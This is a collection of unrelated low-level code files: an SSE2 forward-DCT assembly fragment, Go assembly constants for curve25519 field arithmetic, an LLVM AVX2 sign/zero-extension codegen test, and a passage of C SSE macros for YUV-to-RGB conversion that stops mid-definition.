movdqa xmm5, xmm1 ; transpose coefficients(phase 1)
punpcklwd xmm1, xmm3 ; xmm1=(60 70 61 71 62 72 63 73)
punpckhwd xmm5, xmm3 ; xmm5=(64 74 65 75 66 76 67 77)
movdqa xmm7, xmm6 ; transpose coefficients(phase 2)
punpckldq xmm6, xmm1 ; xmm6=(40 50 60 70 41 51 61 71)
punpckhdq xmm7, xmm1 ; xmm7=(42 52 62 72 43 53 63 73)
movdqa xmm3, xmm2 ; transpose coefficients(phase 2)
punpckldq xmm2, xmm5 ; xmm2=(44 54 64 74 45 55 65 75)
punpckhdq xmm3, xmm5 ; xmm3=(46 56 66 76 47 57 67 77)
movdqa xmm1, XMMWORD [wk(0)] ; xmm1=(20 30 21 31 22 32 23 33)
movdqa xmm5, XMMWORD [wk(1)] ; xmm5=(24 34 25 35 26 36 27 37)
movdqa XMMWORD [wk(0)], xmm7 ; wk(0)=(42 52 62 72 43 53 63 73)
movdqa XMMWORD [wk(1)], xmm2 ; wk(1)=(44 54 64 74 45 55 65 75)
movdqa xmm7, xmm0 ; transpose coefficients(phase 2)
punpckldq xmm0, xmm1 ; xmm0=(00 10 20 30 01 11 21 31)
punpckhdq xmm7, xmm1 ; xmm7=(02 12 22 32 03 13 23 33)
movdqa xmm2, xmm4 ; transpose coefficients(phase 2)
punpckldq xmm4, xmm5 ; xmm4=(04 14 24 34 05 15 25 35)
punpckhdq xmm2, xmm5 ; xmm2=(06 16 26 36 07 17 27 37)
movdqa xmm1, xmm0 ; transpose coefficients(phase 3)
punpcklqdq xmm0, xmm6 ; xmm0=(00 10 20 30 40 50 60 70)=data0
punpckhqdq xmm1, xmm6 ; xmm1=(01 11 21 31 41 51 61 71)=data1
movdqa xmm5, xmm2 ; transpose coefficients(phase 3)
punpcklqdq xmm2, xmm3 ; xmm2=(06 16 26 36 46 56 66 76)=data6
punpckhqdq xmm5, xmm3 ; xmm5=(07 17 27 37 47 57 67 77)=data7
movdqa xmm6, xmm1
movdqa xmm3, xmm0
psubw xmm1, xmm2 ; xmm1=data1-data6=tmp6
psubw xmm0, xmm5 ; xmm0=data0-data7=tmp7
paddw xmm6, xmm2 ; xmm6=data1+data6=tmp1
paddw xmm3, xmm5 ; xmm3=data0+data7=tmp0
movdqa xmm2, XMMWORD [wk(0)] ; xmm2=(42 52 62 72 43 53 63 73)
movdqa xmm5, XMMWORD [wk(1)] ; xmm5=(44 54 64 74 45 55 65 75)
movdqa XMMWORD [wk(0)], xmm1 ; wk(0)=tmp6
movdqa XMMWORD [wk(1)], xmm0 ; wk(1)=tmp7
movdqa xmm1, xmm7 ; transpose coefficients(phase 3)
punpcklqdq xmm7, xmm2 ; xmm7=(02 12 22 32 42 52 62 72)=data2
punpckhqdq xmm1, xmm2 ; xmm1=(03 13 23 33 43 53 63 73)=data3
movdqa xmm0, xmm4 ; transpose coefficients(phase 3)
punpcklqdq xmm4, xmm5 ; xmm4=(04 14 24 34 44 54 64 74)=data4
punpckhqdq xmm0, xmm5 ; xmm0=(05 15 25 35 45 55 65 75)=data5
movdqa xmm2, xmm1
movdqa xmm5, xmm7
paddw xmm1, xmm4 ; xmm1=data3+data4=tmp3
paddw xmm7, xmm0 ; xmm7=data2+data5=tmp2
psubw xmm2, xmm4 ; xmm2=data3-data4=tmp4
psubw xmm5, xmm0 ; xmm5=data2-data5=tmp5
; -- Even part
movdqa xmm4, xmm3
movdqa xmm0, xmm6
psubw xmm3, xmm1 ; xmm3=tmp13
psubw xmm6, xmm7 ; xmm6=tmp12
paddw xmm4, xmm1 ; xmm4=tmp10
paddw xmm0, xmm7 ; xmm0=tmp11
paddw xmm6, xmm3
psllw xmm6, PRE_MULTIPLY_SCALE_BITS
pmulhw xmm6, [rel PW_F0707] ; xmm6=z1
movdqa xmm1, xmm4
movdqa xmm7, xmm3
psubw xmm4, xmm0 ; xmm4=data4
psubw xmm3, xmm6 ; xmm3=data6
paddw xmm1, xmm0 ; xmm1=data0
paddw xmm7, xmm6 ; xmm7=data2
movdqa xmm0, XMMWORD [wk(0)] ; xmm0=tmp6
movdqa xmm6, XMMWORD [wk(1)] ; xmm6=tmp7
movdqa XMMWORD [wk(0)], xmm4 ; wk(0)=data4
movdqa XMMWORD [wk(1)], xmm3 ; wk(1)=data6
; -- Odd part
paddw xmm2, xmm5 ; xmm2=tmp10
paddw xmm5, xmm0 ; xmm5=tmp11
paddw xmm0, xmm6 ; xmm0=tmp12, xmm6=tmp7
psllw xmm2, PRE_MULTIPLY_SCALE_BITS
psllw xmm0, PRE_MULTIPLY_SCALE_BITS
psllw xmm5, PRE_MULTIPLY_SCALE_BITS
pmulhw xmm5, [rel PW_F0707] ; xmm5=z3
movdqa xmm4, xmm2 ; xmm4=tmp10
psubw xmm2, xmm0
pmulhw xmm2, [rel PW_F0382] ; xmm2=z5
pmulhw xmm4, [rel PW_F0541] ; xmm4=MULTIPLY(tmp10,FIX_0_541196)
pmulhw xmm0, [rel PW_F1306] ; xmm0=MULTIPLY(tmp12,FIX_1_306562)
paddw xmm4, xmm2 ; xmm4=z2
paddw xmm0, xmm2 ; xmm0=z4
movdqa xmm3, xmm6
psubw xmm6, xmm5 ; xmm6=z13
paddw xmm3, xmm5 ; xmm3=z11
movdqa xmm2, xmm6
movdqa xmm5, xmm3
psubw xmm6, xmm4 ; xmm6=data3
psubw xmm3, xmm0 ; xmm3=data7
paddw xmm2, xmm4 ; xmm2=data5
paddw xmm5, xmm0 ; xmm5=data1
; ---- Pass 2: process columns.
; xmm1=(00 10 20 30 40 50 60 70), xmm7=(02 12 22 32 42 52 62 72)
; xmm5=(01 11 21 31 41 51 61 71), xmm6=(03 13 23 33 43 53 63 73)
movdqa xmm4, xmm1 ; transpose coefficients(phase 1)
punpcklwd xmm1, xmm5 ; xmm1=(00 01 10 11 20 21 30 31)
punpckhwd xmm4, xmm5 ; xmm4=(40 41 50 51 60 61 70 71)
movdqa xmm0, xmm7 ; transpose coefficients(phase 1)
punpcklwd xmm7, xmm6 ; xmm7=(02 03 12 13 22 23 32 33)
punpckhwd xmm0, xmm6 ; xmm0=(42 43 52 53 62 63 72 73)
movdqa xmm5, XMMWORD [wk(0)] ; xmm5=col4
movdqa xmm6, XMMWORD [wk(1)] ; xmm6=col6
; xmm5=(04 14 24 34 44 54 64 74), xmm6=(06 16 26 36 46 56 66 76)
; xmm2=(05 15 25 35 45 55 65 75), xmm3=(07 17 27 37 47 57 67 77)
movdqa XMMWORD [wk(0)], xmm7 ; wk(0)=(02 03 12 13 22 23 32 33)
movdqa XMMWORD [wk(1)], xmm0 ; wk(1)=(42 43 52 53 62 63 72 73)
movdqa xmm7, xmm5 ; transpose coefficients(phase 1)
punpcklwd xmm5, xmm2 ; xmm5=(04 05 14 15 24 25 34 35)
punpckhwd xmm7, xmm2 ; xmm7=(44 45 54 55 64 65 74 75)
movdqa xmm0, xmm6 ; transpose coefficients(phase 1)
punpcklwd xmm6, xmm3 ; xmm6=(06 07 16 17 26 27 36 37)
punpckhwd xmm0, xmm3 ; xmm0=(46 47 56 57 66 67 76 77)
movdqa xmm2, xmm5 ; transpose coefficients(phase 2)
punpckldq xmm5, xmm6 ; xmm5=(04 05 06 07 14 15 16 17)
punpckhdq xmm2, xmm6 ; xmm2=(24 25 26 27 34 35 36 37)
movdqa xmm3, xmm7 ; transpose coefficients(phase 2)
punpckldq xmm7, xmm0 ; xmm7=(44 45 46 47 54 55 56 57)
punpckhdq xmm3, xmm0 ; xmm3=(64 65 66 67 74 75 76 77)
movdqa xmm6, XMMWORD [wk(0)] ; xmm6=(02 03 12 13 22 23 32 33)
movdqa xmm0, XMMWORD [wk(1)] ; xmm0=(42 43 52 53 62 63 72 73)
movdqa XMMWORD [wk(0)], xmm2 ; wk(0)=(24 25 26 27 34 35 36 37)
movdqa XMMWORD [wk(1)], xmm7 ; wk(1)=(44 45 46 47 54 55 56 57)
movdqa xmm2, xmm1 ; transpose coefficients(phase 2)
punpckldq xmm1, xmm6 ; xmm1=(00 01 02 03 10 11 12 13)
punpckhdq xmm2, xmm6 ; xmm2=(20 21 22 23 30 31 32 33)
movdqa xmm7, xmm4 ; transpose coefficients(phase 2)
punpckldq xmm4, xmm0 ; xmm4=(40 41 42 43 50 51 52 53)
punpckhdq xmm7, xmm0 ; xmm7=(60 61 62 63 70 71 72 73)
movdqa xmm6, xmm1 ; transpose coefficients(phase 3)
punpcklqdq xmm1, xmm5 ; xmm1=(00 01 02 03 04 05 06 07)=data0
punpckhqdq xmm6, xmm5 ; xmm6=(10 11 12 13 14 15 16 17)=data1
movdqa xmm0, xmm7 ; transpose coefficients(phase 3)
punpcklqdq xmm7, xmm3 ; xmm7=(60 61 62 63 64 65 66 67)=data6
punpckhqdq xmm0, xmm3 ; xmm0=(70 71 72 73 74 75 76 77)=data7
movdqa xmm5, xmm6
movdqa xmm3, xmm1
psubw xmm6, xmm7 ; xmm6=data1-data6=tmp6
psubw xmm1, xmm0 ; xmm1=data0-data7=tmp7
paddw xmm5, xmm7 ; xmm5=data1+data6=tmp1
paddw xmm3, xmm0 ; xmm3=data0+data7=tmp0
movdqa xmm7, XMMWORD [wk(0)] ; xmm7=(24 25 26 27 34 35 36 37)
movdqa xmm0, XMMWORD [wk(1)] ; xmm0=(44 45 46 47 54 55 56 57)
movdqa XMMWORD [wk(0)], xmm6 ; wk(0)=tmp6
movdqa XMMWORD [wk(1)], xmm1 ; wk(1)=tmp7
movdqa xmm6, xmm2 ; transpose coefficients(phase 3)
punpcklqdq xmm2, xmm7 ; xmm2=(20 21 22 23 24 25 26 27)=data2
punpckhqdq xmm6, xmm7 ; xmm6=(30 31 32 33 34 35 36 37)=data3
movdqa xmm1, xmm4 ; transpose coefficients(phase 3)
punpcklqdq xmm4, xmm0 ; xmm4=(40 41 42 43 44 45 46 47)=data4
punpckhqdq xmm1, xmm0 ; xmm1=(50 51 52 53 54 55 56 57)=data5
movdqa xmm7, xmm6
movdqa xmm0, xmm2
paddw xmm6, xmm4 ; xmm6=data3+data4=tmp3
paddw xmm2, xmm1 ; xmm2=data2+data5=tmp2
psubw xmm7, xmm4 ; xmm7=data3-data4=tmp4
psubw xmm0, xmm1 ; xmm0=data2-data5=tmp5
; -- Even part
movdqa xmm4, xmm3
movdqa xmm1, xmm5
psubw xmm3, xmm6 ; xmm3=tmp13
psubw xmm5, xmm2 ; xmm5=tmp12
paddw xmm4, xmm6 ; xmm4=tmp10
paddw xmm1, xmm2 ; xmm1=tmp11
paddw xmm5, xmm3
psllw xmm5, PRE_MULTIPLY_SCALE_BITS
pmulhw xmm5, [rel PW_F0707] ; xmm5=z1
movdqa xmm6, xmm4
movdqa xmm2, xmm3
psubw xmm4, xmm1 ; xmm4=data4
psubw xmm3, xmm5 ; xmm3=data6
paddw xmm6, xmm1 ; xmm6=data0
paddw xmm2, xmm5 ; xmm2=data2
movdqa XMMWORD [XMMBLOCK(4,0,rdx,SIZEOF_DCTELEM)], xmm4
movdqa XMMWORD [XMMBLOCK(6,0,rdx,SIZEOF_DCTELEM)], xmm3
movdqa XMMWORD [XMMBLOCK(0,0,rdx,SIZEOF_DCTELEM)], xmm6
movdqa XMMWORD [XMMBLOCK(2,0,rdx,SIZEOF_DCTELEM)], xmm2
; -- Odd part
movdqa xmm1, XMMWORD [wk(0)] ; xmm1=tmp6
movdqa xmm5, XMMWORD [wk(1)] ; xmm5=tmp7
paddw xmm7, xmm0 ; xmm7=tmp10
paddw xmm0, xmm1 ; xmm0=tmp11
paddw xmm1, xmm5 ; xmm1=tmp12, xmm5=tmp7
psllw xmm7, PRE_MULTIPLY_SCALE_BITS
psllw xmm1, PRE_MULTIPLY_SCALE_BITS
psllw xmm0, PRE_MULTIPLY_SCALE_BITS
pmulhw xmm0, [rel PW_F0707] ; xmm0=z3
movdqa xmm4, xmm7 ; xmm4=tmp10
psubw xmm7, xmm1
pmulhw xmm7, [rel PW_F0382] ; xmm7=z5
pmulhw xmm4, [rel PW_F0541] ; xmm4=MULTIPLY(tmp10,FIX_0_541196)
pmulhw xmm1, [rel PW_F1306] ; xmm1=MULTIPLY(tmp12,FIX_1_306562)
paddw xmm4, xmm7 ; xmm4=z2
paddw xmm1, xmm7 ; xmm1=z4
movdqa xmm3, xmm5
psubw xmm5, xmm0 ; xmm5=z13
paddw xmm3, xmm0 ; xmm3=z11
movdqa xmm6, xmm5
movdqa xmm2, xmm3
psubw xmm5, xmm4 ; xmm5=data3
psubw xmm3, xmm1 ; xmm3=data7
paddw xmm6, xmm4 ; xmm6=data5
paddw xmm2, xmm1 ; xmm2=data1
movdqa XMMWORD [XMMBLOCK(3,0,rdx,SIZEOF_DCTELEM)], xmm5
movdqa XMMWORD [XMMBLOCK(7,0,rdx,SIZEOF_DCTELEM)], xmm3
movdqa XMMWORD [XMMBLOCK(5,0,rdx,SIZEOF_DCTELEM)], xmm6
movdqa XMMWORD [XMMBLOCK(1,0,rdx,SIZEOF_DCTELEM)], xmm2
; Epilogue: undo the aligned frame (caller's rsp was saved at [rbp]).
uncollect_args 1
mov rsp, rbp ; rsp <- aligned rbp
pop rsp ; rsp <- original rbp
pop rbp
ret
; For some reason, the OS X linker does not honor the request to align the
; segment unless we do this.
align 32
| {
"language": "Assembly"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// This code was translated into a form compatible with 6a from the public
// domain sources in SUPERCOP: https://bench.cr.yp.to/supercop.html
// +build amd64,!gccgo,!appengine
// These constants cannot be encoded in non-MOVQ immediates.
// We access them directly from memory instead.
// 996687872 == 121666 << 13 (value check: 121666 * 8192).
DATA ·_121666_213(SB)/8, $996687872
GLOBL ·_121666_213(SB), 8, $8
// 0xFFFFFFFFFFFDA == 2^52 - 38; presumably the low limb of 2*P for
// radix-2^51 field arithmetic -- confirm against the SUPERCOP source.
DATA ·_2P0(SB)/8, $0xFFFFFFFFFFFDA
GLOBL ·_2P0(SB), 8, $8
// 0xFFFFFFFFFFFFE == 2^52 - 2; the remaining limbs share this value.
// (GLOBL flag 8 = RODATA, per runtime/textflag.h.)
DATA ·_2P1234(SB)/8, $0xFFFFFFFFFFFFE
GLOBL ·_2P1234(SB), 8, $8
| {
"language": "Assembly"
} |
; RUN: llc < %s -mtriple=x86_64-apple-darwin -mcpu=x86-64 -mattr=+avx2 | FileCheck %s
; Sign-extension tests: each checks that a vector load feeding an AVX2
; pmovsx* intrinsic is folded into a single memory-operand vpmovsx*.
; (The "test_lvm" spelling matches its own CHECK-LABEL, so it is kept.)
define <16 x i16> @test_lvm_x86_avx2_pmovsxbw(<16 x i8>* %a) {
; CHECK-LABEL: test_lvm_x86_avx2_pmovsxbw
; CHECK: vpmovsxbw (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <16 x i16> @llvm.x86.avx2.pmovsxbw(<16 x i8> %1)
ret <16 x i16> %2
}
define <8 x i32> @test_llvm_x86_avx2_pmovsxbd(<16 x i8>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovsxbd
; CHECK: vpmovsxbd (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <8 x i32> @llvm.x86.avx2.pmovsxbd(<16 x i8> %1)
ret <8 x i32> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovsxbq(<16 x i8>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovsxbq
; CHECK: vpmovsxbq (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovsxbq(<16 x i8> %1)
ret <4 x i64> %2
}
define <8 x i32> @test_llvm_x86_avx2_pmovsxwd(<8 x i16>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovsxwd
; CHECK: vpmovsxwd (%rdi), %ymm0
%1 = load <8 x i16>* %a, align 1
%2 = call <8 x i32> @llvm.x86.avx2.pmovsxwd(<8 x i16> %1)
ret <8 x i32> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovsxwq(<8 x i16>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovsxwq
; CHECK: vpmovsxwq (%rdi), %ymm0
%1 = load <8 x i16>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovsxwq(<8 x i16> %1)
ret <4 x i64> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovsxdq(<4 x i32>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovsxdq
; CHECK: vpmovsxdq (%rdi), %ymm0
%1 = load <4 x i32>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovsxdq(<4 x i32> %1)
ret <4 x i64> %2
}
; Zero-extension tests: same folding checks for the pmovzx* family.
define <16 x i16> @test_lvm_x86_avx2_pmovzxbw(<16 x i8>* %a) {
; CHECK-LABEL: test_lvm_x86_avx2_pmovzxbw
; CHECK: vpmovzxbw (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <16 x i16> @llvm.x86.avx2.pmovzxbw(<16 x i8> %1)
ret <16 x i16> %2
}
define <8 x i32> @test_llvm_x86_avx2_pmovzxbd(<16 x i8>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovzxbd
; CHECK: vpmovzxbd (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <8 x i32> @llvm.x86.avx2.pmovzxbd(<16 x i8> %1)
ret <8 x i32> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovzxbq(<16 x i8>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovzxbq
; CHECK: vpmovzxbq (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovzxbq(<16 x i8> %1)
ret <4 x i64> %2
}
define <8 x i32> @test_llvm_x86_avx2_pmovzxwd(<8 x i16>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovzxwd
; CHECK: vpmovzxwd (%rdi), %ymm0
%1 = load <8 x i16>* %a, align 1
%2 = call <8 x i32> @llvm.x86.avx2.pmovzxwd(<8 x i16> %1)
ret <8 x i32> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovzxwq(<8 x i16>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovzxwq
; CHECK: vpmovzxwq (%rdi), %ymm0
%1 = load <8 x i16>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovzxwq(<8 x i16> %1)
ret <4 x i64> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovzxdq(<4 x i32>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovzxdq
; CHECK: vpmovzxdq (%rdi), %ymm0
%1 = load <4 x i32>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovzxdq(<4 x i32> %1)
ret <4 x i64> %2
}
; Intrinsic declarations (typed-pointer, pre-opaque-pointer IR syntax).
declare <4 x i64> @llvm.x86.avx2.pmovzxdq(<4 x i32>)
declare <4 x i64> @llvm.x86.avx2.pmovzxwq(<8 x i16>)
declare <8 x i32> @llvm.x86.avx2.pmovzxwd(<8 x i16>)
declare <4 x i64> @llvm.x86.avx2.pmovzxbq(<16 x i8>)
declare <8 x i32> @llvm.x86.avx2.pmovzxbd(<16 x i8>)
declare <16 x i16> @llvm.x86.avx2.pmovzxbw(<16 x i8>)
declare <4 x i64> @llvm.x86.avx2.pmovsxdq(<4 x i32>)
declare <4 x i64> @llvm.x86.avx2.pmovsxwq(<8 x i16>)
declare <8 x i32> @llvm.x86.avx2.pmovsxwd(<8 x i16>)
declare <4 x i64> @llvm.x86.avx2.pmovsxbq(<16 x i8>)
declare <8 x i32> @llvm.x86.avx2.pmovsxbd(<16 x i8>)
declare <16 x i16> @llvm.x86.avx2.pmovsxbw(<16 x i8>)
| {
"language": "Assembly"
} |
// Copyright 2016 Adrien Descamps
// Distributed under BSD 3-Clause License
/* You need to define the following macros before including this file:
SSE_FUNCTION_NAME
STD_FUNCTION_NAME
YUV_FORMAT
RGB_FORMAT
*/
/* You may define the following macro, which affects generated code:
SSE_ALIGNED
*/
/*
 * LOAD_SI128/SAVE_SI128: the 128-bit load/store primitives used by the
 * macros below. The aligned/streaming variants are kept commented out
 * because the unaligned forms were measured as faster (see note below).
 */
#ifdef SSE_ALIGNED
/* Unaligned instructions seem faster, even on aligned data? */
/*
#define LOAD_SI128 _mm_load_si128
#define SAVE_SI128 _mm_stream_si128
*/
#define LOAD_SI128 _mm_loadu_si128
#define SAVE_SI128 _mm_storeu_si128
#else
#define LOAD_SI128 _mm_loadu_si128
#define SAVE_SI128 _mm_storeu_si128
#endif
/*
 * UV2RGB_16: compute the 16-bit chroma contributions to R/G/B for 16
 * pixels using the coefficients in *param, then widen each 8-lane
 * result to two 8-lane outputs by duplicating every 16-bit value
 * (unpacklo/hi with itself). Uses locals r_tmp/g_tmp/b_tmp.
 */
#define UV2RGB_16(U,V,R1,G1,B1,R2,G2,B2) \
r_tmp = _mm_mullo_epi16(V, _mm_set1_epi16(param->v_r_factor)); \
g_tmp = _mm_add_epi16( \
_mm_mullo_epi16(U, _mm_set1_epi16(param->u_g_factor)), \
_mm_mullo_epi16(V, _mm_set1_epi16(param->v_g_factor))); \
b_tmp = _mm_mullo_epi16(U, _mm_set1_epi16(param->u_b_factor)); \
R1 = _mm_unpacklo_epi16(r_tmp, r_tmp); \
G1 = _mm_unpacklo_epi16(g_tmp, g_tmp); \
B1 = _mm_unpacklo_epi16(b_tmp, b_tmp); \
R2 = _mm_unpackhi_epi16(r_tmp, r_tmp); \
G2 = _mm_unpackhi_epi16(g_tmp, g_tmp); \
B2 = _mm_unpackhi_epi16(b_tmp, b_tmp); \
/* end UV2RGB_16 (terminates the trailing-backslash continuation) */
/*
 * ADD_Y2RGB_16: add the scaled, shifted luma term to each chroma
 * contribution and arithmetic-shift down by PRECISION to obtain the
 * 16-bit R/G/B values for both 8-pixel halves.
 */
#define ADD_Y2RGB_16(Y1,Y2,R1,G1,B1,R2,G2,B2) \
Y1 = _mm_mullo_epi16(_mm_sub_epi16(Y1, _mm_set1_epi16(param->y_shift)), _mm_set1_epi16(param->y_factor)); \
Y2 = _mm_mullo_epi16(_mm_sub_epi16(Y2, _mm_set1_epi16(param->y_shift)), _mm_set1_epi16(param->y_factor)); \
\
R1 = _mm_srai_epi16(_mm_add_epi16(R1, Y1), PRECISION); \
G1 = _mm_srai_epi16(_mm_add_epi16(G1, Y1), PRECISION); \
B1 = _mm_srai_epi16(_mm_add_epi16(B1, Y1), PRECISION); \
R2 = _mm_srai_epi16(_mm_add_epi16(R2, Y2), PRECISION); \
G2 = _mm_srai_epi16(_mm_add_epi16(G2, Y2), PRECISION); \
B2 = _mm_srai_epi16(_mm_add_epi16(B2, Y2), PRECISION); \
/* end ADD_Y2RGB_16 */
/* end of any preceding continuation */
/*
 * PACK_RGB565_32: pack 32 pixels of 8-bit R/G/B into RGB565 words
 * (R in bits 15..11, G in 10..5, B in 4..0).
 */
#define PACK_RGB565_32(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4) \
{ \
__m128i red_mask, tmp1, tmp2, tmp3, tmp4; \
\
red_mask = _mm_set1_epi16((short)0xF800); \
RGB1 = _mm_and_si128(_mm_unpacklo_epi8(_mm_setzero_si128(), R1), red_mask); \
RGB2 = _mm_and_si128(_mm_unpackhi_epi8(_mm_setzero_si128(), R1), red_mask); \
RGB3 = _mm_and_si128(_mm_unpacklo_epi8(_mm_setzero_si128(), R2), red_mask); \
RGB4 = _mm_and_si128(_mm_unpackhi_epi8(_mm_setzero_si128(), R2), red_mask); \
tmp1 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpacklo_epi8(G1, _mm_setzero_si128()), 2), 5); \
tmp2 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpackhi_epi8(G1, _mm_setzero_si128()), 2), 5); \
tmp3 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpacklo_epi8(G2, _mm_setzero_si128()), 2), 5); \
tmp4 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpackhi_epi8(G2, _mm_setzero_si128()), 2), 5); \
RGB1 = _mm_or_si128(RGB1, tmp1); \
RGB2 = _mm_or_si128(RGB2, tmp2); \
RGB3 = _mm_or_si128(RGB3, tmp3); \
RGB4 = _mm_or_si128(RGB4, tmp4); \
tmp1 = _mm_srli_epi16(_mm_unpacklo_epi8(B1, _mm_setzero_si128()), 3); \
tmp2 = _mm_srli_epi16(_mm_unpackhi_epi8(B1, _mm_setzero_si128()), 3); \
tmp3 = _mm_srli_epi16(_mm_unpacklo_epi8(B2, _mm_setzero_si128()), 3); \
tmp4 = _mm_srli_epi16(_mm_unpackhi_epi8(B2, _mm_setzero_si128()), 3); \
RGB1 = _mm_or_si128(RGB1, tmp1); \
RGB2 = _mm_or_si128(RGB2, tmp2); \
RGB3 = _mm_or_si128(RGB3, tmp3); \
RGB4 = _mm_or_si128(RGB4, tmp4); \
}
/*
 * PACK_RGB24_32_STEP1/STEP2: one round of even/odd byte interleaving;
 * PACK_RGB24_32 alternates them five times to produce packed 24-bpp RGB.
 */
#define PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
RGB1 = _mm_packus_epi16(_mm_and_si128(R1,_mm_set1_epi16(0xFF)), _mm_and_si128(R2,_mm_set1_epi16(0xFF))); \
RGB2 = _mm_packus_epi16(_mm_and_si128(G1,_mm_set1_epi16(0xFF)), _mm_and_si128(G2,_mm_set1_epi16(0xFF))); \
RGB3 = _mm_packus_epi16(_mm_and_si128(B1,_mm_set1_epi16(0xFF)), _mm_and_si128(B2,_mm_set1_epi16(0xFF))); \
RGB4 = _mm_packus_epi16(_mm_srli_epi16(R1,8), _mm_srli_epi16(R2,8)); \
RGB5 = _mm_packus_epi16(_mm_srli_epi16(G1,8), _mm_srli_epi16(G2,8)); \
RGB6 = _mm_packus_epi16(_mm_srli_epi16(B1,8), _mm_srli_epi16(B2,8)); \
/* end PACK_RGB24_32_STEP1 */
#define PACK_RGB24_32_STEP2(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
R1 = _mm_packus_epi16(_mm_and_si128(RGB1,_mm_set1_epi16(0xFF)), _mm_and_si128(RGB2,_mm_set1_epi16(0xFF))); \
R2 = _mm_packus_epi16(_mm_and_si128(RGB3,_mm_set1_epi16(0xFF)), _mm_and_si128(RGB4,_mm_set1_epi16(0xFF))); \
G1 = _mm_packus_epi16(_mm_and_si128(RGB5,_mm_set1_epi16(0xFF)), _mm_and_si128(RGB6,_mm_set1_epi16(0xFF))); \
G2 = _mm_packus_epi16(_mm_srli_epi16(RGB1,8), _mm_srli_epi16(RGB2,8)); \
B1 = _mm_packus_epi16(_mm_srli_epi16(RGB3,8), _mm_srli_epi16(RGB4,8)); \
B2 = _mm_packus_epi16(_mm_srli_epi16(RGB5,8), _mm_srli_epi16(RGB6,8)); \
/* end PACK_RGB24_32_STEP2 */
/* PACK_RGB24_32: full 24-bpp pack of 32 pixels (five interleave rounds). */
#define PACK_RGB24_32(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP2(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP2(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
/* end PACK_RGB24_32 */
/*
 * PACK_RGBA_32: interleave four 8-bit planes (including alpha) into
 * 32-bpp pixels; the operand order at the call site selects the byte
 * order (RGBA/BGRA/ARGB/ABGR).
 */
#define PACK_RGBA_32(R1, R2, G1, G2, B1, B2, A1, A2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6, RGB7, RGB8) \
{ \
__m128i lo_ab, hi_ab, lo_gr, hi_gr; \
\
lo_ab = _mm_unpacklo_epi8( A1, B1 ); \
hi_ab = _mm_unpackhi_epi8( A1, B1 ); \
lo_gr = _mm_unpacklo_epi8( G1, R1 ); \
hi_gr = _mm_unpackhi_epi8( G1, R1 ); \
RGB1 = _mm_unpacklo_epi16( lo_ab, lo_gr ); \
RGB2 = _mm_unpackhi_epi16( lo_ab, lo_gr ); \
RGB3 = _mm_unpacklo_epi16( hi_ab, hi_gr ); \
RGB4 = _mm_unpackhi_epi16( hi_ab, hi_gr ); \
\
lo_ab = _mm_unpacklo_epi8( A2, B2 ); \
hi_ab = _mm_unpackhi_epi8( A2, B2 ); \
lo_gr = _mm_unpacklo_epi8( G2, R2 ); \
hi_gr = _mm_unpackhi_epi8( G2, R2 ); \
RGB5 = _mm_unpacklo_epi16( lo_ab, lo_gr ); \
RGB6 = _mm_unpackhi_epi16( lo_ab, lo_gr ); \
RGB7 = _mm_unpacklo_epi16( hi_ab, hi_gr ); \
RGB8 = _mm_unpackhi_epi16( hi_ab, hi_gr ); \
}
/*
 * PACK_PIXEL: format-dispatched packing of the two 16-pixel rows
 * (r_8_11/r_8_12 etc.) into the output registers rgb_1..rgb_N, chosen
 * by the RGB_FORMAT the including file defines.
 */
#if RGB_FORMAT == RGB_FORMAT_RGB565
#define PACK_PIXEL \
